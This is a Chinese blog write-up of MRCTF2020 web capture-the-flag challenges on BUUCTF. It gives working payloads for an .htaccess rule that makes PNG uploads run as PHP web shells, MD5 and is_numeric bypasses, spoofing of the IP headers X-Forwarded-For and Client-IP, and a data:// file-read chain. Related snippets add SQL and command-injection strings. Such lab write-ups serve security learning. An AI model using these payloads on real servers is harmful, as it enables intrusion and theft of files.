[BUUCTF][MRCTF2020]部分web wp

最新推荐文章于 2024-11-25 22:57:33 发布
原创 最新推荐文章于 2024-11-25 22:57:33 发布 · 833 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

本文详细介绍了多种Web安全漏洞的利用方法,包括.htaccess文件解析漏洞、MD5与is_numeric绕过、X-Forwarded-For伪造、PHP解密与文件包含等。通过实例展示了如何通过空格替换、正则绕过、Base64编码及自定义加密算法等手段获取服务器上的敏感信息。

[MRCTF2020]你传你🐎呢

学习链接:[CTF].htaccess的使用技巧总结

fuzz测试,发现过滤了php后缀,中间件是apache,可以上传png图片马。

思路:利用.htaccess来将png文件当作php文件解析

先上传.htaccess文件,文件解析

AddType application/x-httpd-php .png

image-20211005221813132

然后再上传一个png图片马

image-20211005222356600

最后用蚁剑连接就可以啦!

[MRCTF2020]Ez_bypass

include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    if (md5($id) === md5($gg) && $id !== $gg) {
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            if (!is_numeric($passwd))
            {
                 if($passwd==1234567)
                 {
                     echo 'Good Job!';
                     highlight_file('flag.php');
                     die('By Retr_0');
                 }
                 else
                 {
                     echo "can you think twice??";
                 }
            }
            else{
                echo 'You can not get it !';
            }

        }
        else{
            die('only one way to get the flag');
        }
}
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
}

第一个是一个md5比较,数组绕过

?gg[]=1&id[]=2

第二个is_numeric绕过,十六进制绕过、%00截断绕过、弱类型比较绕过均可

passwd=1234567a

[MRCTF2020]PYWebsite

F12查看源码

function enc(code){
      hash = hex_md5(code);
      return hash;
    }
    function validate(){
      var code = document.getElementById("vcode").value;
      if (code != ""){
        if(hex_md5(code) == "0cd4da0223c0b280829dc3ea458d655c"){
          alert("您通过了验证!");
          window.location = "./flag.php"
        }else{
          alert("你的授权码不正确!");
        }
      }else{
        alert("请输入授权码");
      }
      
    }

验证成功后要进入/flag.php,尝试进入

image-20211010011955605

嘿嘿,我们仔细读一读,猜测应该是要本地伪造

X-Forwarded-For: 127.0.0.1

image-20211010014823900

[MRCTF2020]套娃

F12

//1st
$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}

$_SERVER["QUERY_STRING"]获取查询语句,获取的是?后面的值
$_SERVER["REQUEST_URI"] 获取 http://localhost 后面的值,包括/
$_SERVER["SCRIPT_NAME"] 获取当前脚本的路径,如:index.php
$_SERVER["PHP_SELF"] 当前正在执行脚本的文件名

第一个if判断:php会把空格( )或者点(.)自动替换成下划线(_),可以绕过

第二个if判断:prep_match()正则匹配,在23333后面加%0A绕过

b.u.p.t=23333%0A

得到提示:FLAG is in secrettw.php

进入之后查看源码,发现有jsfuck,控制台运行后弹出post me Merak

随便post一个值就可以得到源码

error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>

分析一下源码:

1.检测ip是否为本地ip

2.通过file_get_content函数将整个数据读入一个字符串中,但是后面的值使用的单引号,并且中间使用===来判断全等

3.加密参数,然后包含输出file参数的值

不难构造前两个

Client-IP: 127.0.0.1 
?2333=data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=

data://协议具体用法点这里

至于第三个,我们根据它的解密算法来写出加密算法

<?php
  function enc($payload){ 
      for($i=0; $i<strlen($payload); $i++){
        $re .= chr(ord($payload[$i])-$i*2);  
      }
      return base64_encode($re);  
  }
  echo enc('flag.php');
  //flag.php加密后得到:ZmpdYSZmXGI=
?>

所以综上所述,我们构造payload

/secrettw.php?2333=data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=&file=ZmpdYSZmXGI=
Client-IP: 127.0.0.1

得到flag

[MRCTF2020]Ezpop

见我另一篇博客啦

BUUCTF [MRCTF2020]PYWebsite
Chu_Jian_Xiong的博客
10-16 496
[MRCTF2020]PYWebsite 记录一次刷题,不是因为有什么技巧,而是因为简单到令人意外。 一顿分析源码什么的一顿瞎搞 目录一扫直接就出flag.php了,访问一下 抓包看看 没什么特别的,加个X-Forwarded-For: 127.0.0.1看看 flag{2323496f-10f1-45b1-ae61-1a56bf906fca} 就扫个目录改个包就出来了,很离谱… ...
BUUCTF-[MRCTF2020]套娃
最新发布
TMS18的博客
09-27 1093
这篇文章详细记录了一个多步骤的网络安全挑战解题过程。挑战包含四个关卡: 第一关通过F12审查发现注释代码,利用PHP的点号特性绕过下划线限制,并使用换行符绕过正则匹配。 第二关通过添加多个伪造的本地IP请求头(X-Forwarded-For等)绕过IP限制。 第三关分析JSFuck加密代码,通过Node.js脚本解密出关键提示"postmeMerak"。 第四关结合IP伪造和data URI协议绕过限制,使用自定义Python脚本生成加密参数,最终通过change函数解密获取flag.p
[MRCTF2020]PYWebsite -wp
freerats的博客
08-04 1434
查看源码 发现一段前段验证,然后发现在目录下有一个flag.php 提示验证在后端,所以前面那个前端验证没用(也正常,前端验证都可以直接修改) 购买者的ip已经被记录,本地可以看到flag,那么使用xff或者client-ip伪造一下ip试试。 bp抓包 发现xff可以直接获得flag ...
BUUCTF web [MRCTF2020]套娃 1 wp
Whaocai的博客
08-06 667
考点: ①$SERVER数组的各个元素的含义 ②%0a绕过preg_match() ③data://text/plain;base64的利用 进去之后还是先看看有没有robots.txt文件(自己做题的习惯),发现页面并不跳转,猜测应该是index.php中有header在限制 于是查看源码,看到一段php代码 //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($qu
BUUCTF_web[MRCTF2020]你传你呢—超详细wp解析
weixin_52653109的博客
05-06 1331
开始直接传木马,但不管是“图片马”还是其他格式的马,都传不上,一直返回 开始还以为是防火过滤太强了,一直试着绕过。看了下别人的wp原来考察了个htaccess(分布式配置文件) 看了百科和一些大佬的博客介绍的很抽象不好理解,推荐这个网站通俗易懂些 7个常用的.htaccess代码 下面是解题步骤: 一、创建个".htaccess"文件 写入 AddType application/x-httpd-php .png 意思是:上传的".png"会被当做 php代码执行。 先创个文档写入,再另存为选择所有
[MRCTF2020]Ezaudit WP
車鈊的博客
10-23 567
进入网站 获得源码 看到熟悉的网页模板想到了敏感文档泄露和用户信息查询 点击全部链接,尝试输入邮箱发现不是。 完事以后测试其他文件泄露,尝试进行目录遍历,跑脚本 python dirsearch.py -u http://77936295-dc14-466d-9fe7-6cdc5a55a916.node3.buuoj.cn/ -e * --threads=1 发现无论多小的线程速度都会产生429状态码 原来是服务器限制了访问的频率,猜测和BUUCTF服务器有关系。 只能进行手工检测 发现在www.z
BUUCTF-[MRCTF2020]Ezaudit 1
dian的博客
11-10 748
不知道为什么这个脚本算出来的私钥一直都是假的私钥,找了好久也没有找到一个能够正确算出私钥的脚本,这个脚本也是源码里面给的,可能是种子不对吧,尝试过逆推种子,但是计算量太大,逆推不出来,找官方的wp也没有找到。不知道为什么这个脚本算出来的私钥一直都是假的私钥,找了好久也没有找到一个能够正确算出私钥的脚本,这个脚本也是源码里面给的,可能是种子不对吧,尝试过逆推种子,但是计算量太大,逆推不出来,找官方的wp也没有找到。访问解压得到index.php,打开就是源码访问解压得到index.php,打开就是源码。
BUUCTF 部分web wp
Tiny_Hacker的博客
05-21 1811
又要求我们对secret赋值而且还是POST传参,而且赋的值还得是他指定的,在右下有一串base64加密的字符串,对其进行解码后,得到了一个值,猜测是他指定的那个值。添加XFF后,发现没有回应,尝试其他伪造ip的方式,发现当X-Real-ip时有回应,并出现了flag。查询结果出来了flag字符,对这个flag,没有办法查看,只能借助别人的wp了,对大佬膜拜!访问index.pgp.bak,得到了一个文件,打开后是一串代码,进行审计。又提示我们对key赋值,而且赋值为他给定的值,在源码里发现了key值。
[MRCTF2020]vigenere
2er0!=O的博客
05-29 2115
[MRCTF2020]vigenere cipher.txt g vjganxsymda ux ylt vtvjttajwsgt bl udfteyhfgt oe btlc ckjwc qnxdta vbbwwrbrtlx su gnw nrshylwmpy cgwps, lum bipee ynecgy gk jaryz frs fzwjp, x puej jgbs udfteyhfgt, gnw sil uuej su zofi. sc okzfpu bl lmi uhzmwi, x nyc dsj
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2902
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
[MRCTF2020] - Web
qtL0ng的博客
07-01 1201
[MRCTF2020]套娃 打开题目查看源码 <!-- //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b
[WP/BUU/Web/反序列化] [MRCTF2020]Ezpop
車鈊的博客
10-13 232
源码 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { protected $var; // 包
BUUCTF - Web - [MRCTF2020]Ezpop
1tachi的博客
11-30 488
题目源码 <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { protected $var; public function append(
[MRCTF2020]Ezpop--WP
weixin_51313108的博客
08-31 349
[MRCTF2020]Ezpop考点POP链的介绍PHP魔幻函数![在这里插入图片描述](https://img-blog.csdnimg.cn/a52a82820b274d238337a254503da96f.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5bGx5Lit6Zuo5a6i,size_20,color_FFFFFF,t_70,g_se,x_16)解题过程 考点 PH
HECTF2020web部分wp
weixin_46330722的博客
11-25 1880
HECTF签到ezphpssrfmexiazhu 这两周太忙了,考试和实验都堆在一起了,人没了。上周末抽空做了一下HECTF,签到关机一气呵成。 签到 点一下忘记密码 然后就输入手机号,并输入四位验证码。手机号可以在登陆界面的注释中找到,这里说是四位数验证码,那就应该是爆破了。菜鸡的脚本附上 import requests url1='http://121.196.32.184:8080/findpass.php?num=15970773575&check=' url2='&next=%E
MRCTF web部分复现wp
xlcvv的博客
04-05 804
一、ez_bypass 换个界面- 这个有点丑: GET两个参数:gg 和 id,md5值相同但本值不同,md5碰撞,之前有做过:,但是试了一些值都不行? 那就传入的为数组,md5()函数无法处理数组,如果传入数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。 显示出了You got the first steponly one way to get the fl...
BUUCTF:[XNUCA2019Qualifier]EasyPHP -- 关于.htaccess 的各种配置操作,
Zero_Adam的博客
04-16 1660
目录:一、自己做:二、学到的&&不足:1. python 上传.htaccess时的\\问题2. 关于.htaccess解析错误时3. python 上传 .htaccess时,注释符# 的问题!在字符串中进行传输# 也会当作注释符!!三、学习WP:1. 非预期:2. 预期解2:3. 预期解: 参考的文章,看最下面的那两篇就是了 总体: 这些方法看起来很棒,其实我感觉这都是参赛者当时 细心看PHP文档才发现的,而我辈现在直接看他们的现成的东西,如此巧妙的方法之下,是大佬们细心找到的bug点,
BUUCTF之[MRCTF2020]你传你呢 1】
qq_40646572的博客
10-25 6482
首先,正常上传图片文件,竟然因为文件大小的问题,上传失败,就挺难受。不过还好,总算知道是什么原因不能上传。总体来讲,这道题,难度是可以的,需要一步步的进行尝试。
[MRCTF2020]套娃1
不会编程的崽的博客
02-18 1436
php非法传参,data伪协议,[][(![]+[])的js代码,数据包ip的伪造
buuctf web wp
03-08
### BUUCTF Web 题目 Writeup #### SQL 注入攻击中的堆叠注入技巧 在处理SQL注入漏洞时,堆叠注入是一种常见的技术。具体来说,在给定场景中,通过向服务器发送恶意构造的HTTP请求来获取数据库结构信息。例如,为了查询数据库名称: ```sql 1' UNION SELECT NULL, version() -- ``` 当进一步探索表名时,可以利用以下方法绕过简单的过滤机制[^1]。 对于更复杂的过滤条件,比如`from`关键字被加入黑名单的情况,则需要更加巧妙的方法去规避这些限制。一种可能的方式是使用子查询或者其他不涉及敏感关键词的技术实现相同功能。 #### 利用命令注入读取文件内容 针对存在命令注入缺陷的应用程序,可以通过精心设计的有效载荷(payload)执行任意操作系统指令。如下面的例子所示,它展示了如何通过修改URL参数并结合Linux shell工具链(`echo`, `tr`, 和 `cat`)来读取特定文件的内容而不触发基于正则表达式的检测规则[^2]: ```bash /?ip=qq.com;echo$IFS$1FLAG.PHP|tr$IFS$1A-Z$IFS$1a-z|xargs$IFS$1cat ``` 这段代码的作用是以大写字母形式传递目标文件名,并将其转换成小写后再调用`cat`命令打印出来,从而成功绕过了仅识别全小写的防护措施。 #### URL编码与特殊字符替换 PHP框架对来自客户端的数据进行了预处理,这可能导致原始输入发生变化。了解这种行为有助于理解为何某些Payload能够生效而另一些却不行。特别是关于空白符和其他控制字符是如何被解释和存储的知识点非常重要。例如,空格可能会变为下划线或其他符号;NULL字节(%00)也可能引起意外的结果。因此,在构建测试案例之前应该充分考虑这些问题的影响[^3]. ```php <?php // 示例:展示 PHP 如何解析 URL 参数 parse_str('foo=%20bar&baz%00=fizz', $output); print_r($output); // Array ( [foo_] => bar [baz_] => fizz ) ?> ``` 以上就是一些典型的CTF竞赛中遇到的安全挑战及其解决方案概览。希望上述分析能帮助读者更好地理解和解决类似的网络安全问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值